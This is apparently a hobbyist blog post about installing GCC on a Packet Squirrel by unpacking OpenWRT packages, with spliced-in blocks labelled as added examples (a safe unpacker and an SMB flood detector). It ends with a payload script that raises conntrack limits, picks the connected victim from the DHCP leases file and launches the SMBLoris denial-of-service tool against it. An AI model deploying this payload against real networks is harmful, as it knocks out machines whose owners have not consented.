Packet Squirrel GCC and SMBLoris

Since the hardware footprint of the Packet Squirrel is so limited (2 MB for the root filesystem / and 30 MB for the tmpfs /tmp), I decided to find a way to get the GCC compiler and the needed libraries onto the Packet Squirrel without the native opkg package manager.

I attached an 8 GB USB flash drive to the Packet Squirrel and formatted it from there as an EXT4 partition, /dev/sda1

Disk /dev/sda: 7807 MB, 7807401984 bytes
250 heads, 5 sectors/track, 12199 cylinders
Units = cylinders of 1250 * 512 = 640000 bytes

Device Boot Start End Blocks Id System
/dev/sda1 1 12199 7624372+ 83 Linux

/dev/sda1 gets automounted on /mnt upon boot, so we can use this extra space for GCC and the other dependencies

Since I did not want to go through cross-compilation on my x86_64 Linux machine to get the MIPS binaries, I downloaded the precompiled packages from OpenWRT to my x86_64 Linux laptop

The following packages are needed to get C code to compile natively on the Packet Squirrel


Once the packages are downloaded, upload them via scp to the /mnt partition on the Packet Squirrel

scp *.ipk root@

Log in to the Packet Squirrel via ssh

ssh root@ 
root@squirrel:~# mkdir /mnt/tt 
root@squirrel:~# mv /mnt/*.ipk /mnt/tt

And here is what I did with each ipk package separately in /mnt/tt.
The steps below are pretty self-explanatory, since an ipk is really just a gzipped tarball
containing other tarballs.

root@squirrel:/mnt/tt# mv libbfd_2.24-3_ar71xx.ipk libbfd_2.24-3_ar71xx.tar.gz
root@squirrel:/mnt/tt# rm -rf b2/
root@squirrel:/mnt/tt# gunzip libbfd_2.24-3_ar71xx.tar.gz 
root@squirrel:/mnt/tt# tar -xvf libbfd_2.24-3_ar71xx.tar 

We are only interested in the data.tar.gz which contains the compiled binaries
and libraries, so we create a directory called libbfd and move the
data.tar.gz there for extraction

root@squirrel:/mnt/tt# rm debian-binary 
root@squirrel:/mnt/tt# rm control.tar.gz 
root@squirrel:/mnt/tt# rm libbfd_2.24-3_ar71xx.tar 
root@squirrel:/mnt/tt# mkdir libbfd
root@squirrel:/mnt/tt# mv data.tar.gz libbfd/
root@squirrel:/mnt/tt# cd libbfd/
root@squirrel:/mnt/tt/libbfd# ls
root@squirrel:/mnt/tt/libbfd# tar -zxvf data.tar.gz 
root@squirrel:/mnt/tt/libbfd# ls -la
drwxr-xr-x 3 root root 4096 Jul 14 02:11 .
drwxr-xr-x 7 root root 4096 Jul 14 02:10 ..
-rw-r--r-- 1 107 111 393581 Jan 31 2016 data.tar.gz
drwxr-xr-x 3 root root 4096 Jul 14 02:11 usr
root@squirrel:/mnt/tt/libbfd# rm data.tar.gz 
root@squirrel:/mnt/tt/libbfd# cd usr/
root@squirrel:/mnt/tt/libbfd/usr# cd lib/
root@squirrel:/mnt/tt/libbfd/usr/lib# ls -al
drwxr-xr-x 2 root root 4096 Jul 14 02:11 .
drwxr-xr-x 3 root root 4096 Jul 14 02:11 ..
-rwxr-xr-x 1 root root 935260 Jan 31 2016
lrwxrwxrwx 1 root root 14 Jul 14 02:11 ->
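
Unpacking the packages by hand skips the checksum verification that opkg performs on install, so it is worth doing that check, and a member-path check, yourself. The function below is an added example, not part of the original post: it follows the same steps as the session above for one package, and the name unpack_ipk, its arguments and the source of the expected hash are assumptions.

```shell
#!/bin/sh
# Added example: unpack one .ipk by hand with the checks opkg would normally do.
# Usage: unpack_ipk <file.ipk> <dest-dir> [expected-sha256]
# expected-sha256 is a value you trust, e.g. taken from the feed's package
# index over HTTPS (assumption: you have such a value for the package).
unpack_ipk() {
    ipk=$1; dest=$2; want=${3:-}
    [ -f "$ipk" ] || { echo "no such file: $ipk" >&2; return 1; }

    # 1. Integrity: refuse the package if its hash is not the expected one.
    if [ -n "$want" ]; then
        got=$(sha256sum "$ipk" | awk '{print $1}')
        [ "$got" = "$want" ] || { echo "sha256 mismatch: $ipk" >&2; return 2; }
    fi

    # 2. Outer layer: gzipped tar with debian-binary, control.tar.gz, data.tar.gz.
    work=$(mktemp -d) || return 1
    if ! gzip -dc "$ipk" | tar -xf - -C "$work" 2>/dev/null ||
       [ ! -f "$work/data.tar.gz" ]; then
        echo "not an ipk (no data.tar.gz): $ipk" >&2
        rm -rf "$work"; return 3
    fi

    # 3. Refuse payload members that are absolute or contain a '..' component,
    #    so the archive cannot name a path outside <dest-dir>.
    if gzip -dc "$work/data.tar.gz" | tar -tf - |
       grep -Eq '^/|(^|/)\.\.(/|$)'; then
        echo "unsafe member path in $ipk" >&2
        rm -rf "$work"; return 4
    fi

    # 4. Only now extract the binaries and libraries.
    mkdir -p "$dest" && gzip -dc "$work/data.tar.gz" | tar -xf - -C "$dest"
    rc=$?
    rm -rf "$work"
    return "$rc"
}

# Run directly as: sh unpack_ipk.sh libbfd_2.24-3_ar71xx.ipk /mnt/tt/libbfd
if [ "$#" -ge 2 ]; then unpack_ipk "$@"; fi
```

The path check covers member names only; it does not inspect symlink targets inside the archive.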

Next we need to create symlinks from the / root filesystem to the extracted binaries
and libraries on the /mnt USB Flash partition

root@squirrel:/mnt/tt/libbfd/usr/lib# pwd
root@squirrel:/mnt/tt/libbfd/usr/lib# ln -s /mnt/tt/libbfd/usr/lib/ /usr
root@squirrel:/mnt/tt/libbfd/usr/lib# ln -s /mnt/tt/libbfd/usr/lib/ /usr

We repeat the same process for the following packages


Once we are done with these, we can finally move on to extracting the GCC ipk package

root@squirrel:/mnt/tt/gcc/usr# ls -al
drwxr-xr-x 5 root root 4096 Jul 14 02:06 .
drwxr-xr-x 3 root root 4096 Jul 14 02:39 ..
drwxr-xr-x 2 root root 4096 Jul 14 02:06 bin
drwxr-xr-x 3 root root 4096 Jul 14 02:06 include
drwxr-xr-x 3 root root 4096 Jul 14 02:06 lib

root@squirrel:/mnt/tt/gcc/usr/include# ls -al 
drwxr-xr-x 3 root root 4096 Jul 14 02:06 .
drwxr-xr-x 5 root root 4096 Jul 14 02:06 ..
drwxr-xr-x 3 root root 4096 Jul 14 02:06 c++

So we create a complete directory symlink to /mnt/tt/gcc/usr/include
from /usr on the root filesystem of the Packet Squirrel, like so

root@squirrel:/mnt/tt/gcc/usr/include# ls -la include
lrwxrwxrwx 1 root root 25 Jul 14 02:11 include -> /mnt/tt/gcc/usr/include/

Next we do the same for the /mnt/tt/gcc/usr/lib/gcc directory

root@squirrel:/mnt/tt/gcc/usr/lib# ls -al
drwxr-xr-x 3 root root 4096 Jul 14 02:06 .
drwxr-xr-x 5 root root 4096 Jul 14 02:06 ..
drwxr-xr-x 3 root root 4096 Jul 14 02:06 gcc

root@squirrel:/usr/lib# ls -la gcc
lrwxrwxrwx 1 root root 25 Jul 14 02:11 gcc -> /disk/tt/gcc/usr/lib/gcc/

By now you should have a fully working GCC compiler on the Packet Squirrel. You can try to compile and run some code (SMBLoris.c, for example) that you scp to the device

root@squirrel:/mnt/tt/gcc/usr/bin# ./gcc -v
Using built-in specs.
Target: mips-openwrt-linux-uclibc
Configured with: /home/buildbot/slave-local/ar71xx_generic/build/build_dir/target-mips_34kc_uClibc- --target=mips-openwrt-linux --host=mips-openwrt-linux --build=x86_64-linux-gnu --program-prefix= --program-suffix= --prefix=/usr --exec-prefix=/usr --bindir=/usr/bin --sbindir=/usr/sbin --libexecdir=/usr/lib --sysconfdir=/etc --datadir=/usr/share --localstatedir=/var --mandir=/usr/man --infodir=/usr/info --disable-nls --build=x86_64-linux-gnu --host=mips-openwrt-linux-uclibc --target=mips-openwrt-linux-uclibc --enable-languages=c,c++ --with-bugurl= --with-pkgversion='OpenWrt GCC 4.8.3' --enable-shared --disable-__cxa_atexit --enable-target-optspace --with-gnu-ld --disable-nls --disable-libmudflap --disable-multilib --disable-libgomp --disable-libquadmath --disable-libssp --disable-decimal-float --disable-libstdcxx-pch --with-host-libstdcxx=-lstdc++ --prefix=/usr --libexecdir=/usr/lib --with-float=soft
Thread model: posix
gcc version 4.8.3 (OpenWrt GCC 4.8.3)
root@squirrel:/mnt/tt/gcc/usr/bin# ./gcc /mnt/smbloris.c -o /mnt/smbloris

The smbloris.c is taken from Hector Marcan’s GitHub here

The following Packet Squirrel code can be used to launch the SMBLoris attack from this device against the local network to which it is connected; set it to switch 1/2/3

# Set the network mode to NAT 
sleep 5

# You may want to increase your local conntrack limit
echo 1200000 > /proc/sys/net/netfilter/nf_conntrack_max

# Get the IP address for the connected target machine 
ip="$(cat /var/dhcp.leases | awk '{print $3}')"

# Execute smbloris against the target IP 
/mnt/smbloris eth0 $ip &

I have tested this against the latest Windows 10 64-bit version 10.0.16299.19 on physical hardware; the CPU gets to 100 % and memory jumps high, as you can see in the video below

I'm sure there might be some other tools that can be used in a similar manner (exploit code written in C, for example, and compiled on the Packet Squirrel... the possibilities are endless)

Nevertheless this was a fun exercise
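
For anyone watching a machine during a test like the one above, the added example below (not part of the original post) counts TCP connections to the local SMB port 445 per remote address from netstat -an text and reports the addresses at or above a threshold. The function names, the threshold and the sample rows are constructed for illustration.

```shell
#!/bin/sh
# Added example: flag remote addresses holding many connections to local tcp/445.

# Reads `netstat -an` text on stdin (Windows or Linux layout) and prints
# "<remote-ip> <count>" for every remote address with at least $1
# connections to local port 445, busiest first.
smb_flood_sources() {
    awk -v min="$1" '
        toupper($1) ~ /^TCP/ {
            # Windows: proto local foreign state
            # Linux:   proto recvq sendq local foreign state
            l = (NF >= 6) ? $4 : $2
            r = (NF >= 6) ? $5 : $3
            if ($NF ~ /^LISTEN/) next      # the listener itself, not a client
            if (l !~ /:445$/) next         # only connections to the SMB port
            sub(/:[0-9]+$/, "", r)         # drop the remote port
            n[r]++
        }
        END { for (ip in n) if (n[ip] >= min) print ip, n[ip] }
    ' | sort -k2,2nr
}

# Constructed sample in Windows `netstat -an` layout: one ordinary SMB client,
# one RDP session, and 200 connections to port 445 from a single address.
sample_netstat() {
    echo "  TCP    0.0.0.0:445          0.0.0.0:0            LISTENING"
    echo "  TCP    172.16.32.120:445    172.16.32.57:49812   ESTABLISHED"
    echo "  TCP    172.16.32.120:3389   172.16.32.1:50000    ESTABLISHED"
    p=40000
    while [ "$p" -lt 40200 ]; do
        echo "  TCP    172.16.32.120:445    172.16.32.1:$p     ESTABLISHED"
        p=$((p + 1))
    done
}

# Report sources with 100 or more connections in the constructed sample.
sample_netstat | smb_flood_sources 100
```

On a live host, feed it the real netstat output instead of the sample and pick a threshold well above what file-sharing clients on that network normally open.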


About astr0baby

Please run Adblock or similar... we have been told to do so since Carl Sagan wrote the Contact .